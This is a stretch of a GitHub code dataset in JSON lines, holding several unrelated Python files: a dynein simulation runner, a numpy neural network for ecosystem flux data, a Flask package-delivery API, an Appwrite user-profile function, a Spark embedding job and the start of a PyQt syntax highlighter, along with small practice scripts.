\"--k_b\", \"%g\" % float(args.k_b),\n \"--k_ub\", \"%g\" % float(args.k_ub),\n \"--c\", \"%g\" % float(args.exp_unbinding_constant),\n \"--cb\", \"%g\" % float(args.cb),\n \"--cm\", \"%g\" % float(args.cm),\n \"--ct\", \"%g\" % float(args.ct),\n \"--ls\", \"10.49\",\n \"--lt\", \"23.8\",\n \"--eqb\", \"120\",\n \"--eqmpre\", \"200\",\n \"--eqmpost\", \"224\",\n \"--eqt\", \"0\",\n \"--write_rate\", \"%g\" % float(args.write_rate),\n \"--runtime\", \"%g\" % float(args.runtime),\n \"--seed\", \"%g\" % float(args.seed),\n \"--dt\", \"1e-10\",\n \"--L\", \"%g\" % float(L)]\n\n if not os.path.exists('runlogs'):\n os.makedirs('runlogs')\n out = open('runlogs/' + basename + '.out', 'w')\n\n print(\"Running: \", \" \".join(cmd), out)\n out.flush()\n process_object = subprocess.Popen(cmd, stdout=out, stderr=subprocess.PIPE)\n err = process_object.communicate()[1]\n if (err != b''):\n print(\"\\n##################################\",\n \"\\nSimulation exited in error: \\n\\n\",\n err.decode(\"utf-8\"),\n \"\\n##################################\\n\\n\")\n\nwith open(\"data/unbinding_probability/%s.tex\" % args.label, \"w\") as f:\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"runlabel\").replace(\"_\",\"\"), latex_format(args.label)) + '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"kb\").replace(\"_\",\"\"), latex_format(args.k_b)) + '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"kub\").replace(\"_\",\"\"), latex_format(args.k_ub)) + '\\n')\n f.write(r'\\newcommand\\%s{%s}' %(latex_format(\"cexp\").replace(\"_\",\"\"), latex_format(args.exp_unbinding_constant)) + '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"cb\").replace(\"_\",\"\"), latex_format(args.cb))+ '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"cm\").replace(\"_\",\"\"), latex_format(args.cm))+ '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"ct\").replace(\"_\",\"\"), latex_format(args.ct))+ '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"ls\").replace(\"_\",\"\"), latex_format(10.49))+ '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"lt\").replace(\"_\",\"\"), latex_format(23.8))+ '\\n')\n f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"w_rate\").replace(\"_\",\"\"), latex_format(args.write_rate))+ '\\n')\n","repo_name":"elliotc12/dynein_walk","sub_path":"scripts/run-unbinding-rate-simulations.py","file_name":"run-unbinding-rate-simulations.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"9344001837","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\nmin_max_scaler = MinMaxScaler()\nss = StandardScaler()\nnp.random.seed(1) # 使每次随机产生的数都相同\n\n\n# 导入数据\n\nInputIndex = [\n 'Rn', 'PAR', 'fdif', 'PARdif', 'PARdir',\n 'Ta', 'Ts', 'Vpd', 'RH', 'Ustar', 'O3',\n 'VWC5', 'VWC25', 'VWC50', 'VWC100', 'VWC150', 'VWC200']\nOutputIndex = ['NEE']\ndata = pd.read_csv('data/example.csv')\n\n# 分割训练集合验证集,test_size=0.4代表从总的数据集合train中随机选取40%作为验证集,随机种子为0\ntrain = data[InputIndex]\ntarget = data[OutputIndex]\n\ntrX, teX, trY, teY = train_test_split(train, target, test_size=0.2, random_state=0)\nX = min_max_scaler.fit_transform(trX)\nY = min_max_scaler.fit_transform(trY)\ntest_X = min_max_scaler.transform(teX)\ntest_y = min_max_scaler.transform(teY)\n\n\nshape_X = X.shape # X, 行17列\nshape_Y = Y.shape # Y, 1列\nm = X.shape[1] # 样本数\n\ndef sigmoid(x):\n \"\"\"\n Compute the sigmoid of x\n\n Arguments:\n x -- A scalar or numpy array of any size.\n\n Return:\n s -- sigmoid(x)\n \"\"\"\n s = 1 / (1 + np.exp(-x))\n return s\n\n# 定义神经网络结构\ndef layer_sizes(X, Y):\n \"\"\"\n Arguments:\n X -- input dataset of shape (input size, number of examples)\n Y -- labels of shape (output size, number of examples)\n Returns:\n n_x -- the size of the input layer\n n_h -- the size of the hidden layer\n n_y -- the size of the output layer\n \"\"\"\n n_x = X.shape[0] # 输入层神经元个数\n n_h = 20 # 隐藏层神经元个数\n n_y = Y.shape[0] # 输出神经元个数\n\n return (n_x, n_h, n_y)\n\n\n# 初始化模型参数\ndef initialize_parameters(n_x, n_h, n_y):\n \"\"\"\n Argument:\n n_x -- size of the input layer\n n_h -- size of the hidden layer\n n_y -- size of the output layer\n Returns:\n params -- python dictionary containing your parameters:\n W1 -- weight matrix of shape (n_h, n_x)\n b1 -- bias vector of shape (n_h, 1)\n W2 -- weight matrix of shape (n_y, n_h)\n b2 -- bias vector of shape (n_y, 1)\n \"\"\"\n np.random.seed(2)\n W1 = np.random.randn(n_h, n_x) * 0.01\n b1 = np.zeros((n_h, 1))\n W2 = np.random.randn(n_y, n_h) * 0.01\n b2 = np.zeros((n_y, 1))\n assert (W1.shape == (n_h, n_x))\n assert (b1.shape == (n_h, 1))\n assert (W2.shape == (n_y, n_h))\n assert (b2.shape == (n_y, 1))\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n\n return parameters\n\n\n# 前向传播\ndef forward_propagation(X, parameters):\n \"\"\"\n Argument:\n X -- input data of size (n_x, m)\n parameters -- python dictionary containing your parameters (output of initialization function)\n Returns:\n A2 -- The sigmoid output of the second activation\n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\"\n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n # Implement Forward Propagation to calculate A2 (probabilities)\n # np.dot 代表矩阵相乘\n Z1 = np.dot(W1, X) + b1\n A1 = sigmoid(Z1)\n\n Z2 = np.dot(W2, A1) + b2\n A2 = Z2\n\n assert (A2.shape == (1, X.shape[1]))\n\n cache = {\"Z1\": Z1,\n \"A1\": A1,\n \"Z2\": Z2,\n \"A2\": A2}\n\n return A2, cache\n\n\n# 计算cost\ndef compute_cost(A2, Y, parameters):\n \"\"\"\n Computes the cross-entropy cost given in equation (13)\n Arguments:\n A2 -- The sigmoid output of the second activation, of shape (1, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n parameters -- python dictionary containing your parameters W1, b1, W2 and b2\n Returns:\n \"\"\"\n\n cost = np.sqrt(((A2 - Y) ** 2).mean())\n assert (isinstance(cost, float))\n\n return cost\n\n\n# 反向传播\ndef backward_propagation(parameters, cache, X, Y):\n \"\"\"\n Implement the backward propagation using the instructions above.\n Arguments:\n parameters -- python dictionary containing our parameters\n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\".\n X -- input data of shape (2, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n Returns:\n grads -- python dictionary containing your gradients with respect to different parameters\n \"\"\"\n m = X.shape[1] # 样本数目\n\n # First, retrieve W1 and W2 from the dictionary \"parameters\".\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n\n # Retrieve also A1 and A2 from dictionary \"cache\".\n # A1,A2是每一层的输出结果\n A1 = cache[\"A1\"]\n A2 = cache[\"A2\"]\n\n # Backward propagation: calculate dW1, db1, dW2, db2.\n # 输出层误差\n dZ2 = A2 - Y\n # 隐藏层到输出层权重求导数,最后一层是线性值\n dW2 = np.dot(dZ2, A1.T) / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dZ1 = np.multiply(np.dot(W2.T, dZ2), (1 - np.power(A1, 2)))\n # dZ1 = np.multiply(np.dot(W2.T, dZ2), (A1*(1-A1)))\n dW1 = np.dot(dZ1, X.T) / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n\n grads = {\"dW1\": dW1,\n \"db1\": db1,\n \"dW2\": dW2,\n \"db2\": db2,\n \"dZ1\": dZ1}\n\n return grads\n\n\n# 更新参数\ndef update_parameters(parameters, grads, learning_rate=1.2):\n \"\"\"\n Updates parameters using the gradient descent update rule given above\n Arguments:\n parameters -- python dictionary containing your parameters\n grads -- python dictionary containing your gradients\n Returns:\n parameters -- python dictionary containing your updated parameters\n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n # Retrieve each gradient from the dictionary \"grads\"\n dW1 = grads[\"dW1\"]\n db1 = grads[\"db1\"]\n dW2 = grads[\"dW2\"]\n db2 = grads[\"db2\"]\n\n # Update rule for each parameter\n W1 = W1 - learning_rate * dW1\n b1 = b1 - learning_rate * db1\n W2 = W2 - learning_rate * dW2\n b2 = b2 - learning_rate * db2\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n\n return parameters\n\n\n# 打包模型\n# num_iterations: 训练次数,如果nn_model中未指定,默认为10000\ndef nn_model(X, Y, n_h, num_iterations=10000, print_cost=False):\n \"\"\"\n Arguments:\n X -- dataset of shape (2, number of examples)\n Y -- labels of shape (1, number of examples)\n n_h -- size of the hidden layer\n num_iterations -- Number of iterations in gradient descent loop\n print_cost -- if True, print the cost every 1000 iterations\n Returns:\n parameters -- parameters learnt by the model. They can then be used to predict.\n \"\"\"\n np.random.seed(3)\n\n n_x = layer_sizes(X, Y)[0]\n n_y = layer_sizes(X, Y)[2]\n\n # Initialize parameters, then retrieve W1, b1, W2, b2. Inputs: \"n_x, n_h, n_y\". Outputs = \"W1, b1, W2, b2, parameters\".\n parameters = initialize_parameters(n_x, n_h, n_y)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n # Loop (gradient descent)\n for i in range(0, num_iterations):\n # Forward propagation. Inputs: \"X, parameters\". Outputs: \"A2, cache\".\n A2, cache = forward_propagation(X, parameters)\n # Cost function. Inputs: \"A2, Y, parameters\". Outputs: \"cost\".\n cost = compute_cost(A2, Y, parameters)\n # Backpropagation. Inputs: \"parameters, cache, X, Y\". Outputs: \"grads\".\n grads = backward_propagation(parameters, cache, X, Y)\n # Gradient descent parameter update. Inputs: \"parameters, grads\". Outputs: \"parameters\".\n parameters = update_parameters(parameters, grads)\n\n # Print the cost every 1000 iterations\n if print_cost and i % 1000 == 0:\n print(\"Cost after iteration %i: %f\" % (i, cost))\n\n return parameters\n\n\n# 预测函数\ndef predict(parameters, X):\n \"\"\"\n Using the learned parameters, predicts a class for each example in X\n Arguments:\n parameters -- python dictionary containing your parameters\n X -- input data of size (n_x, m)\n Returns\n predictions -- vector of predictions of our model (red: 0 / blue: 1)\n \"\"\"\n\n # Computes probabilities using forward propagation, and classifies to 0/1 using 0.5 as the threshold.\n A2, cache = forward_propagation(X, parameters)\n # predictions = (A2 > 0.5)\n\n return A2, cache\n\n\n# 训练\nparameters = nn_model(X.T, Y.T, n_h=20, num_iterations=3000, print_cost=True)\n# 预测\npredictions, cache = predict(parameters, test_X.T)\nprint('RMSE: ', (np.sqrt(((predictions - test_y.T) ** 2).mean())))\n\n# print(parameters)\n\ngrads = backward_propagation(parameters, cache, test_X.T, test_y.T)\n\n# 开始计算偏导数\nw2 = np.sum(parameters['W2'], axis=1)/parameters['W2'].shape[0]\na = np.dot(parameters['W1'], test_X.T)\ndI = sigmoid(a) * (1-sigmoid(a))\n\n\nd = np.dot(parameters['W1'].T, dI) * w2\n# print(d)\n# 对计算结果进行归一化操作\n\ndraw_y = ss.fit_transform(d.T)\nres = min_max_scaler.inverse_transform(test_X)\n\n# 绘图\ncloumns = train.columns.tolist()\nfor index in range(len(cloumns)):\n plt.figure(index) # 创建图表1\n y = draw_y[:, index]\n x = res[:, index]\n plt.xlabel(cloumns[index])\n plt.ylabel(\"NEE-\"+cloumns[index])\n plt.scatter(x, y)\n plt.savefig(\"res/\"+cloumns[index]+\".png\")","repo_name":"CuriousLei/DerivationOfANN","sub_path":"tf.py","file_name":"tf.py","file_ext":"py","file_size_in_byte":9772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31423508311","text":"# input은 숫자와 * / - +\n# input()\n# Calculator 클래스 생성\n# 계산하는 함수\n# 결과값을 출력하는 함수\n\nclass calc:\n\n\n def __init__(self, input):\n self.input = input\n self.string = []\n\n def parse(self):\n self.string = self.input.split(' ')\n \n def calculate(self):\n i = 0\n a = self.string\n# 1 + 2 - 4 * 3\n while i < len(a):\n if a[i] == \"*\":\n result = int(a[i-1]) * int(a[i+1])\n a[i] = result\n a.pop(i+1)\n a.pop(i-1)\n elif a[i] == \"/\":\n result = int(a[i-1]) / int(a[i+1])\n a[i] = result\n a.pop(i+1)\n a.pop(i-1)\n i+=1\n i=0\n while i < len(a):\n if a[i] == \"-\":\n result = int(a[i-1]) - int(a[i+1])\n a[i] = result\n a.pop(i+1)\n a.pop(i-1)\n i = i-1\n elif a[i] == \"+\":\n result = int(a[i-1]) + int(a[i+1])\n a[i] = result\n a.pop(i+1)\n a.pop(i-1)\n i = i-1\n i+=1\n print(a[0])\n\n\n\ndef get_input():\n str = input()\n return str\n\n# str = get_input()\n\ncal = calc(\"1 + 2 - 4 * 3\")\ncal.parse()\ncal.calculate()","repo_name":"RoseBLINK/2022Python-study","sub_path":"pythonGrammar/practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3414609750","text":"import os\nimport json\n\nfrom appwrite.client import Client\nfrom appwrite.services.database import Database\n\ndef init_client():\n # Initialize the Appwrite client\n client = Client()\n client.set_endpoint(os.getenv(\"APPWRITE_ENDPOINT\"))\n client.set_project(os.getenv(\"APPWRITE_PROJECT_ID\"))\n client.set_key(os.getenv(\"APPWRITE_API_KEY\"))\n\n return client\n\ndef main():\n payload = json.loads(os.getenv(\"APPWRITE_FUNCTION_EVENT_DATA\"))\n user_collection_id = os.getenv(\"APPWRITE_USER_COLLECTION_ID\")\n\n userId = payload[\"$id\"]\n userName = payload[\"name\"]\n email = payload[\"email\"]\n\n\n client = init_client()\n database = Database(client)\n\n database.create_document(user_collection_id, {'user_id': userId, 'user_name': userName, 'email': email}, read=['*'])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"appwrite/demos-for-functions","sub_path":"python/create_user_profile/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"67"} +{"seq_id":"23675751548","text":"def factorial(val):\n if val == 0:\n return 1\n return factorial(val-1) * val \nval = factorial(int(input()))\ncnt = 0\nwhile True:\n if val % 10**(cnt+1) == 0:\n cnt +=1 \n else:\n break # for consecutive search \nprint(cnt)","repo_name":"amo33/study_projects","sub_path":"Study/python_start/1676.py","file_name":"1676.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16328293552","text":"from flask import request, session, abort\nfrom flask_restx import Namespace, Resource\n\nfrom delivery.calc import calculate_path\nfrom delivery.models import db, Package, Token, Node, User\nfrom delivery.schemas import PackageSchema\nfrom delivery.utils import authed, notify_user, verify_keys\n\npackages = Namespace('packages')\n\n\n@packages.route('')\nclass Packages(Resource):\n @authed\n def get(self):\n if 'filter' not in request.args.keys():\n abort(403, 'insufficient arguments')\n f = request.args['filter']\n ret = {}\n for k, v in {'sending': 'sender_id',\n 'receiving': 'receiver_id',\n 'delivering': 'courier_id',\n 'manage': 'manager_id'}.items():\n pkgs = Package.query.filter_by(**{v: session['user_id']}).all() \\\n if f == 'all' or f == k else []\n ret[k] = [PackageSchema(view=k).dump(item) for item in pkgs]\n return ret\n\n @authed\n @verify_keys({'token': str, 'user_id': int})\n def head(self):\n req = request.json\n package = Package.query.filter_by(token=req['token']).first()\n if package is None:\n abort(404, '快件不存在')\n node = package.current_node\n if node.manager_id != session['user_id']:\n abort(403, '只有快件所在站点的管理员能够调用')\n user = User.query.filter_by(id=req['id']).first()\n if user is None:\n abort(404, '用户不存在')\n package.courier_id = req['id']\n db.session.commit()\n return {'msg': '成功指派送货员'}\n\n @authed\n @verify_keys({'token': str, 'node_uuid': str})\n def post(self):\n token = Token.query.filter_by(token=request.json['token']).first()\n first_node = Node.query.filter_by(\n uuid=request.json['node_uuid']).first()\n if not token:\n abort(404, '收货节点不存在')\n if not first_node:\n abort(404, '发货节点不存在')\n try:\n path = calculate_path(first_node.id, token.address.id)\n except ValueError:\n abort(404, '收发货节点无法联通')\n\n package = Package(\n sender_id=session['user_id'],\n receiver_id=token.user_id,\n next_node_id=first_node.id,\n path=path,\n )\n db.session.add(package)\n db.session.commit()\n return {'uuid': package.token}\n\n @authed\n @verify_keys({'uuid': str})\n def put(self):\n package = Package.query.filter_by(token=request.json['uuid']).first()\n\n if not package:\n abort(404, '快件不存在')\n if package.receiver_id == session['user_id']:\n package.progress = len(package.path) - 1\n db.session.commit()\n return {'msg': '快件成功送达'}\n if package.next_node.manager_id != session['user_id']:\n abort(403, '只有节点管理员能够调用')\n\n package.progress = package.progress + 1\n package.manager_id = package.current_node.manager_id\n if package.progress == len(package.path) - 1:\n notify_user(\n package.receiver.open_id,\n 'Inifv86VCZGFaBhIh2ECIini4tJPgBxpC9Gni68zsSM', {\n 'node': package.current_node.token,\n 'phone': package.current_node.manager.phone,\n 'username': package.current_node.manager.username, \n 'code': package.token[:4]\n })\n db.session.commit()\n return {'msg': f'快件成功抵达{package.current_node.id}号节点'}\n","repo_name":"FrankArchive/Delivery","sub_path":"backend/delivery/api/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13081807872","text":"\"\"\"\nThis module runs a series of test cases on modules a and b of the Ormuco\nquestions.\n\nUsage: python2 test.py or python3 test.py\ntests for a.py output if lines are overlaping\ntests for b.py output -1, 0 or 1 according to if the first of two version\nnumbers is smaller than, equal to or larger than the second one.\n\nFor details of modules a and b refer to their respective files.\n\"\"\"\n\nimport time\nimport a\nimport b\nimport c\n\n\ndef _test_module(f, test_cases):\n \"\"\"Runs test_cases with function f on origin module\n\n arguments\n f: module with function to run test_cases on\n test_cases: list with test values to run into module function f\n\n \"\"\"\n print('## Testing %s' % f.__name__)\n for t in test_cases:\n print('Testing %s with values: %s' % (f.__name__, str(t)))\n print(f(t[0], t[1]))\n print()\n\n\ntest_cases_a = [\n ([0, 10],[10, 20]), \n ([-10, -9],[-1, -2]), \n ([-10, -5],[-7, 2]), \n ([-5, -10],[2, -7]), \n ([-10, 10],[1, 2]),\n ]\n\ntest_cases_b = [\n ('1.1.1', '1.1.1'),\n ('1.1.1', '1.1.1', '.'),\n ('1_1_1', '1_1_2', '_'),\n ('1_1_2', '1_1_1', '_'),\n ('1_2_1', '1_1_2', '_'),\n ('1_10_1', '1_5_20', '_'),\n ('0.1.1', '1.1.1'),\n ('1.1az.1', '1.1b.1'),\n ('1a.1.1', '1.2d.1'),\n ('1abc.1def.1abc', '1abc.2def.1abc')\n ]\n\ntest_cases_c = [\n ('t1', 1),\n ('t2', 2),\n ('t3', 3),\n ('t4', 4),\n ('t5', 5),\n ('t6', 6),\n ('t7', 7)\n ]\n\n_test_module(a.are_lines_overlaping, test_cases_a)\n_test_module(b.compare_versions, test_cases_b)\n\n# test c.py\nmax_cached_items = 5\nstale_delay = 2 # in seconds\n\nprint('## Testing lru (c.py)')\nprint('Setting up lru with max 5 items and expiry time of 2 seconds')\nlru = c.Lru(max_cached_items, stale_delay)\nfor k, v in test_cases_c:\n print('Adding element in lru')\n lru.set_value(k, v)\n print('Current values in lru %s' % lru.get_values())\nprint('wainting for 1 second')\ntime.sleep(1)\nlru.set_value('t6', 6)\nprint('waiting for initial values to expire')\ntime.sleep(1)\nprint('Current values in lru %s' % lru.get_values())\n\n","repo_name":"classmathieuloyer/ormuco","sub_path":"mathieu_loyer_test.py","file_name":"mathieu_loyer_test.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25723341895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"../../\")\nimport os\nimport logging\nimport argparse\nimport ConfigParser\nimport common.datetime_wrapper as datetime\nimport common.hadoop_shell_wrapper as hadoop_shell\nimport common.spark_submit_wrapper as spark\n\n\nFILE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nlogging.basicConfig(\n level=logging.INFO,\n format='[%(asctime)s - %(filename)s - %(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\ndef process(args):\n config = ConfigParser.SafeConfigParser()\n config.read(args.conf)\n\n embed_module_option = \"{}_embedding\".format(args.module)\n\n input_path_bert_embedding = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": args.date,\n \"dir\": config.get(\"embedding_history\", \"dir\")\n })\n input_path_video_ctr_stat = config.get(\"inputs\", \"video_ctr_stat\", 0, {\"date\": args.date})\n output_path = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": args.date,\n \"dir\": config.get(embed_module_option, \"dir\")\n })\n\n if hadoop_shell.exists_all(output_path, flag=True, print_missing=True):\n logging.info(\"output already exists, skip\")\n return 0\n\n if not hadoop_shell.exists_all_with_retry(\n input_path_video_ctr_stat,\n flag=True,\n print_info=True,\n retry=config.getint(\"common\", \"upstream_retry\"),\n interval=config.getint(\"common\", \"upstream_interval\")):\n logging.error(\"finally, input not ready, exit!\")\n return 1\n\n if not hadoop_shell.rmr(output_path):\n logging.error(\"fail to clear output folder\")\n return 1\n\n ss = spark.SparkSubmitWrapper()\n\n ss.set_master(\"yarn\")\\\n .set_deploy_mode(\"cluster\")\\\n .set_driver_memory(\"1G\")\\\n .set_executor_memory(\"1G\") \\\n .add_conf(\"spark.executor.memoryOverhead\", 2048) \\\n .set_executor_cores(2)\\\n .set_num_executors(100)\\\n .add_conf(\"spark.network.timeout\", 600)\\\n .set_name(config.get(\"common\", \"job_name\", 0, {'date': args.date, 'module': \"FilterEmbedding-{}\".format(args.module)}))\\\n .set_queue(config.get(\"common\", \"job_queue\"))\\\n .set_class(\"com.td.ml.x2vec.bert.FilterEmbedding\")\\\n .set_app_jar(FILE_DIR + \"/../../lib/\" + config.get(\"common\", \"jar\"))\\\n .add_app_argument(\"normalize\", config.getboolean(\"bert\", \"normalize\")) \\\n .add_app_argument(\"ctr_bound\", config.getfloat(embed_module_option, \"ctr_bound\")) \\\n .add_app_argument(\"display_bound\", config.getint(embed_module_option, \"display_bound\")) \\\n .add_app_argument(\"click_bound\", config.getint(embed_module_option, \"click_bound\")) \\\n .add_app_argument(\"input_path_bert_embedding\", input_path_bert_embedding)\\\n .add_app_argument(\"input_path_video_ctr_stat\", input_path_video_ctr_stat)\\\n .add_app_argument(\"output_path\", output_path)\n\n return 0 if ss.run(print_cmd=True, print_info=True) else 1\n\n\ndef del_expire(args):\n config = ConfigParser.SafeConfigParser()\n config.read(args.conf)\n\n embed_module_option = \"{}_embedding\".format(args.module)\n\n if not args.expire or config.getint(\"common\", \"expire\") <= 0:\n return 0\n\n lifetime = config.getint(embed_module_option, \"lifetime\")\n\n if lifetime > 0:\n dt_expire = datetime.DateTime(args.date).apply_offset_by_day(-lifetime)\n expire_path = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": dt_expire,\n \"dir\": config.get(embed_module_option, \"dir\")\n })\n if not hadoop_shell.rmr(expire_path):\n logging.error(\"fail to del expired path: %s\", expire_path)\n return 1\n return 0\n\n\ndef run(args):\n if process(args) == 0 and del_expire(args) == 0:\n return 0\n return 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='build user inference samples')\n parser.add_argument('--date', dest='date', required=True, help=\"which date(%%Y-%%m-%%d)\")\n parser.add_argument('--conf', dest='conf', required=True, help=\"conf file\")\n parser.add_argument('--module', dest='module', required=True, choices=[\"recommendable\", \"queryable\"])\n parser.add_argument('--expire', dest='expire', action=\"store_true\", help=\"whether to del expired path\")\n\n arguments = parser.parse_args()\n\n try:\n if not datetime.DateTime(arguments.date).is_perfect_date():\n raise RuntimeError(\"passed arg [date={}] format error\".format(arguments.date))\n sys.exit(run(arguments))\n except Exception as ex:\n logging.exception(\"exception occur in %s, %s\", __file__, ex)\n sys.exit(1)\n","repo_name":"Jayyyyyyyyyyyy/x2vec","sub_path":"src/scheduling/bert/modules/run_filter_embedding.py","file_name":"run_filter_embedding.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74937177173","text":"\"\"\"\nbased on Python Syntax highlighting from:\nhttp://diotavelli.net/PyQtWiki/Python%20syntax%20highlighting\n\"\"\"\nimport sys\n\nfrom PyQt4.QtCore import QRegExp\nfrom PyQt4.QtGui import QColor, QTextCharFormat, QFont, QSyntaxHighlighter, QPen\n\nfrom tools import loader\n\ndef format(color, style=''):\n \"\"\"Return a QTextCharFormat with the given attributes.\n \"\"\"\n _color = QColor()\n _color.setNamedColor(color)\n\n _format = QTextCharFormat()\n _format.setFontFamily('monospace')\n _format.setForeground(_color)\n if 'bold' in style:\n _format.setFontWeight(QFont.Bold)\n if 'italic' in style:\n _format.setFontItalic(True)\n\n return _format\n\n\n# Syntax styles that can be shared by all languages\nSTYLES = {\n 'keyword': format('darkMagenta', 'bold'),\n 'operator': format('darkRed'),\n 'brace': format('#858585'),\n 'definition': format('black', 'bold'),\n 'string': format('green'),\n 'string2': format('darkGreen'),\n 'comment': format('gray', 'italic'),\n 'properObject': format('darkBlue', 'italic'),\n 'numbers': format('brown'),\n 'spaces': format('#BFBFBF'),\n}\n\n\nclass Highlighter (QSyntaxHighlighter):\n keywords = []\n\n # operators\n operators = []\n\n # braces\n braces = []\n def __init__(self, document, lang):\n QSyntaxHighlighter.__init__(self, document)\n langSyntax = loader.syntax[lang]\n Highlighter.keywords = langSyntax.get('keywords', [])\n Highlighter.braces = langSyntax.get('brace', [])\n Highlighter.operators = langSyntax.get('operators', [])\n\n rules = []\n\n # Keyword, operator, and brace rules\n rules += [(r'\\b%s\\b' % w, 0, STYLES['keyword'])\n for w in Highlighter.keywords]\n rules += [(r'%s' % o, 0, STYLES['operator'])\n for o in Highlighter.operators]\n rules += [(r'%s' % b, 0, STYLES['brace'])\n for b in Highlighter.braces]\n\n # All other rules\n proper = langSyntax.get('properObject', None)\n if proper is not None:\n proper = '\\\\b' + str(proper[0]) + '\\\\b'\n rules += [\n # 'self'\n (proper, 0, STYLES['properObject'])]\n\n rules.append((r'__\\w+__', 0, STYLES['properObject']))\n \n definition = langSyntax.get('definition', [])\n for de in definition:\n expr = '\\\\b' + de + '\\\\b\\\\s*(\\\\w+)'\n rules.append((expr, 1, STYLES['definition']))\n\n rules += [\n # Numeric literals\n (r'\\b[+-]?[0-9]+[lL]?\\b', 0, STYLES['numbers']),\n (r'\\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\\b', 0, STYLES['numbers']),\n (r'\\b[+-]?[0-9]+(?:\\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\\b', 0, STYLES['numbers']),\n ]\n\n stringChar = langSyntax.get('string', [])\n for sc in stringChar:\n expr = r'\"[^\"\\\\]*(\\\\.[^\"\\\\]*)*\"' if sc == '\"' else r\"'[^'\\\\]*(\\\\.[^'\\\\]*)*'\"\n rules.append((expr, 0, STYLES['string']))\n\n # Multi-line strings (expression, flag, style)\n # FIXME: The triple-quotes in these two lines will mess up the\n # syntax highlighting from this point onward\n self.tri_single = (QRegExp(\"'''\"), 1, STYLES['string2']) #'''\n self.tri_double = (QRegExp('\"\"\"'), 2, STYLES['string2']) #\"\"\"\n\n comments = langSyntax.get('comment', [])\n for co in comments:\n expr = co + '[^\\\\n]*'\n rules.append((expr, 0, STYLES['comment']))\n\n rules.append(('\\s+', 0, STYLES['spaces']))\n\n # Build a QRegExp for each pattern\n self.rules = [(QRegExp(pat), index, fmt)\n for (pat, index, fmt) in rules]\n\n\n def highlightBlock(self, text):\n \"\"\"Apply syntax highlighting to the given block of text.\n \"\"\"\n # Do other syntax formatting\n for expression, nth, format in self.rules:\n index = expression.indexIn(text, 0)\n\n while index >= 0:\n # We actually want the index of the nth match\n index = expression.pos(nth)\n length = expression.cap(nth).length()\n self.setFormat(index, length, format)\n index = expression.indexIn(text, index + length)\n\n self.setCurrentBlockState(0)\n\n # Do multi-line strings\n in_multiline = self.match_multiline(text, *self.tri_single)\n if not in_multiline:\n in_multiline = self.match_multiline(text, *self.tri_double)\n\n\n def match_multiline(self, text, delimiter, in_state, style):\n \"\"\"Do highlighting of multi-line strings. ``delimiter`` should be a\n ``QRegExp`` for triple-single-quotes or triple-double-quotes, and\n ``in_state`` should be a unique integer to represent the corresponding\n state changes when inside those strings. Returns True if we're still\n inside a multi-line string when this function is finished.\n \"\"\"\n # If inside triple-single quotes, start at 0\n if self.previousBlockState() == in_state:\n start = 0\n add = 0\n 